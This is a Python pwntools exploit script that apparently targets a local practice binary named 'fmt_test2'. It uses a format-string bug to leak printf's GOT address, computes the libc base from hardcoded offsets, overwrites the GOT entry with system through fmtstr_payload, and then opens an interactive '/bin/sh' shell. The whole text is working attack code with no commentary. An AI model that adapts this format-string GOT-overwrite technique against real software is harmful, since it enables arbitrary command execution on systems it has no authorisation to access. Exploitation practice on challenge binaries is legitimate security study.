#! /usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

offset___libc_start_main_ret = 0x18e81
offset_system = 0x0003cd10
offset_dup2 = 0x000e6110
offset_read = 0x000e5620
offset_write = 0x000e56f0
offset_str_bin_sh = 0x17b8cf
offset_puts = 0x00067360
offset_printf = 0x00050b60

context.log_level = 'debug'

p = process("./fmt_test2")


printf_got = 0x0804a010
leak_payload = "b%13$saa" + p32(printf_got)

p.sendline(leak_payload)

p.recvuntil("b")
info = p.recvuntil("aa")[:-2]
print info.encode('hex')

print_add = u32(info[:4])
libc_base = print_add - offset_printf
system_add = libc_base + offset_system

payload = fmtstr_payload(11, {printf_got: system_add})

p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()